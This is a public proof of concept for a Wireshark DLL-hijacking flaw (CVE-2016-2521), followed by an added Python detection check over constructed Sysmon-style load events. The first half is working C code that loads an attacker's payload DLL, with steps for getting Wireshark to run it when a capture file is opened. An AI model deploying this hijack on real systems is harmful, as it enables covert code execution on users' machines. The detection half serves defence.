Wireshark <= 1.12.9 DLL hijacking exploit (riched20.dll.dll)
/*
# Exploit Title: Wireshark <= 1.12.9 DLL hijacking exploit (riched20.dll.dll)
# Date: 19/04/2016
# Exploit Author: EccE
# Vendor Homepage: www.wireshark.org
# Software Link: www.wireshark.org/download/win32/all-versions/Wireshark-win32-1.12.5.exe
# Version: 1.15.5 & 1.15.1 tested (but should be working on all versions named in the CVE)
# Category: local
# Tested on: Windows 7 x64 (Service Pack 1, build 7601)
# CVE : CVE-2016-2521

Compile and rename this code as "riched20.dll.dll". The "poc.dll" file contains your payload.

Create a file in the same directory with one of the following extensions
(default Wireshark file extension associations):
.5vw / .acp / .apc / .atc / .bfr / .cap / .enc / .erf / .fdc / .pcap / .pcapng /
.pkt / .rf5 / .snoop / .syc / .tpc / .tr1 / .trace / .trc / .wpc / .wpz

Double click & watch your payload executed =]

See this video for a demo: https://www.youtube.com/watch?v=_KX2vMXo3Hc

Special thanks @gentilkiwi for pointing out the obvious to me !
*/
#include "stdafx.h"
#include <windows.h>   // HINSTANCE and LoadLibraryA (normally pulled in through stdafx.h)

// Another DLL which contains the payload to execute; the load happens while this
// module is being initialised by the process that picked up riched20.dll.dll.
HINSTANCE hDll = LoadLibraryA("poc.dll");

// We forward all the exportable functions of the Windows riched20.dll from our DLL,
// so the host application keeps working while our code runs.
#pragma comment(linker, "/export:CreateTextServices=C:/Windows/System32/riched20.CreateTextServices")
#pragma comment(linker, "/export:IID_IRichEditOle=C:/Windows/System32/riched20.IID_IRichEditOle")
#pragma comment(linker, "/export:IID_IRichEditOleCallback=C:/Windows/System32/riched20.IID_IRichEditOleCallback")
#pragma comment(linker, "/export:IID_ITextHost=C:/Windows/System32/riched20.IID_ITextHost")
#pragma comment(linker, "/export:IID_ITextHost2=C:/Windows/System32/riched20.IID_ITextHost2")
#pragma comment(linker, "/export:IID_ITextServices=C:/Windows/System32/riched20.IID_ITextServices")
#pragma comment(linker, "/export:REExtendedRegisterClass=C:/Windows/System32/riched20.REExtendedRegisterClass")
#pragma comment(linker, "/export:RichEdit10ANSIWndProc=C:/Windows/System32/riched20.RichEdit10ANSIWndProc")
#pragma comment(linker, "/export:RichEditANSIWndProc=C:/Windows/System32/riched20.RichEditANSIWndProc")
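The hijack above leaves a clear trace in image-load telemetry: the loading process resolves a module named like a Windows system DLL (here the double-extension "riched20.dll.dll") from the directory of the opened capture instead of System32. The following detection check is an added example, not part of the original exploit; the events are constructed, modelled on the Image / ImageLoaded fields of a Sysmon Event ID 7 record, and the trusted-directory and watched-name lists are assumptions to be tuned per environment.

```python
import ntpath

# Where the genuine riched20.dll is expected to resolve from (assumption: default Windows install).
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# System DLL base names worth watching; riched20 is the one CVE-2016-2521 abuses.
WATCHED_STEMS = {"riched20"}

def dll_stem(name):
    """'RichEd20.DLL.dll' -> 'riched20': strip every trailing .dll so a
    double-extension file maps onto the system DLL it impersonates."""
    stem = name.lower()
    while stem.endswith(".dll"):
        stem = stem[:-4]
    return stem

def hijack_reason(event):
    """Return why this load looks like DLL search-order hijacking, or None."""
    directory, name = ntpath.split(event["ImageLoaded"].lower())
    directory = directory.rstrip("\\")
    if name.endswith(".dll.dll"):
        return "double .dll extension (riched20.dll.dll pattern)"
    if dll_stem(name) in WATCHED_STEMS and directory not in SYSTEM_DIRS:
        return f"system DLL name loaded from {directory}"
    return None

def scan(events):
    """Return (process, loaded image, reason) for every suspicious load."""
    return [(e["Image"], e["ImageLoaded"], r)
            for e in events if (r := hijack_reason(e)) is not None]

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Wireshark\Wireshark.exe",       # normal load
     "ImageLoaded": r"C:\Windows\System32\riched20.dll"},
    {"Image": r"C:\Program Files\Wireshark\Wireshark.exe",       # the PoC's file name
     "ImageLoaded": r"C:\Users\alice\Downloads\riched20.dll.dll"},
    {"Image": r"C:\Program Files\Wireshark\Wireshark.exe",       # planted copy, single extension
     "ImageLoaded": r"C:\Users\alice\Downloads\riched20.dll"},
    {"Image": r"C:\Windows\System32\notepad.exe",                # unrelated benign load
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
]

if __name__ == "__main__":
    for proc, dll, reason in scan(SAMPLE_EVENTS):
        print(f"{proc} loaded {dll}: {reason}")
```

Pairing the rule with the process image (Wireshark.exe for this CVE) and the user's file-association capture directories keeps false positives low; the single-extension rule also catches the classic planted-copy variant.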